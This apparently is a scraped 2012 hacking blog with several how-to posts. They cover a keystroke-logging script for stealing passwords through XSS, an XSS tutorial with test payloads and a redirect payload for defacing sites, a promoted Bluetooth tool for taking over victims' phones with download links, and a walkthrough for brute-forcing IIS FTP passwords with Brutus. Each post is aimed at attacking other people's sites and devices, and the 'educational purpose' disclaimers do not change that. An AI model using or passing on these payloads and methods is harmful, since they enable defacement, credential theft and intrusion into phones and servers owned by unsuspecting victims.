Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.

If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords.

I Hope You Like THis Topic...

Keep Visiting www.indicyborg.blogspot.in
Read More

Thursday, 9 August 2012

XSS : Cross Site Scripting complete Tutorial

| |
0 comments


Hello friends today i am back with one of the most famous website hacking tutorial on "XSS Attack"
Number of worlds best sites including Microsoft,Google,Facebook, you tube and many more best company sites are vulnerable to Xss Attack.still today today also hackers from all over the world use this XSS : Cross Site Scripting to find Vulnerability on the best websites.

Here is the details tutorial on XSS/Cross Site Scripting and also how to exploit it.

What is XSS?, what can I accomplish with it?

XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

Reason Behind XSS vulnerability?

Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.

Types of XSS

There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.
We discussing here The basics of XSS and cookie logging.

Tutorial On XSS

How to test for XSS vulnerabilities.

To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.

**<*script*>alert('XSS');

(Important:Please remove "*" or type the above text on search box without "*")

Now we will see a pop up message "XSS"shown In picture

Click here to see image

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

"*>*alert('XSS');
(Important:Please remove '*' or type the above text on search box without '*') Now, we have found out that it is vulnerable.Lets go to next step.

Deface/Hacking a webpage with XSS?

Here is the important part that explain defacing website i have methods for both persistent, and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before: <*script*>window.location="*http://yourdefacepage.com/index.html";<*/script*> (Important:Please remove '*' or type the above text on search box without '*') Remember, you can always alter the code if it doesn't work. You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.

Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger i will be posting soon stay touched with IndiCyborg
Read More

Monday, 6 August 2012

Bluetooth Hacking

| |
1 comments

Magic blue hack is Free mobile Bluetooth hacking software developed for j2me(Java S40) based  handsets. By using this Software You can Hack and Gain almost full acess of victim's Mobile. hack you can gain almost full control over the victim phone.

Installation and setup of magic blue hack is quite easy, hope you all knows how to install a software in mobile phone, you need  run this java application in Your phone
To connect to the other phone you need to run magic blue hack and search for the devices. Then select the target device you want to hack. Whats really sad about this application is that it asks the victim to accept the incoming connection, so it’s not really a hack in true sense of the word.
You can even make phone calls; put the call on hold or hang of the phone. Just enter the phone number you need to call and press the call button.

To send sms just enter the phone number of the person you want to send sms and write your text in the text box and then click the send message button. The charges for sending the sms will deducted from the hacked device.
Reading the phone book of the victim phone is also very easy but in some phones specially symbian, this feature is not working correctly and the new release of magicbluehack may solve this problem.


Despite being the intruder of privacy magic blue hack can't exactly be called as a hacking software as there is need for the victim to accept the incoming connection but hacking means bypassing the security parameters and sneak into the device without the owner even knowing about it. It should rather be put as toy software rather than hacking software.


Download Magic Blue Hack


Jar File || jad File
Read More

Sunday, 5 August 2012

How To Hack IIS FTP Password Using Brute Force Attack

| |
0 comments

What is FTP ?

FTP is an application or service or protocol which can be used to transfer files from one place to another place ,it really comes very handy during transfer of files from a local box to a remote one .Suppose someone get access to your FTP then he/she can cause nightmare for you by uploading unappropriate images or files etc.Here we will discuss how we can crack the password of IIS installed FTP service in Windows.

What is Brute-Force?

Brute-force is a type of attack in which every possible combination of letters, digits and special characters are tried until the right password is matched with the username. The main limitation of this attack is its time factor. The time it takes to find the proper match mainly depends on the length and complexity of the password.Here I will be using this attack to crack the password.So,lets start….

All These tutorial are for educational purpose only we are not responsible for any of its misuse.


Requirements:
The tool we will be using ” BrutusA2”(Download: http://www.hoobie.net/brutus/)
You need to know the target suppose “ftp://123.123.xx.xxx”

Procedure:

Step 1.Here I have shown an authentication page of an FTP service in the image below and in the following steps we will crack its password using brutus.

Step 2.Now open up “Brutus” and type your desire target ,select wordlist and select “FTP” from the drop down menu and click start. If you are confused then follow the image below.

Step 3.The time it takes as I mentioned above depends on the complexity and length of the password.So after clicking the start button wait for the time as mentioned in the tool.The password will be displayed as shown above.

Recommendation: I would recommend the readers to try it in a virtual environment as I did and enjoy the trick.It is not advisable to try it on some unknown user without prior permission.
All These tutorial are for educational purpose only we are not responsible for any of its misuse.
Read More

Receive all updates via Facebook. Just Click the Like Button Below

?

You can also receive Free Email Updates:

Powered By IndiCyborg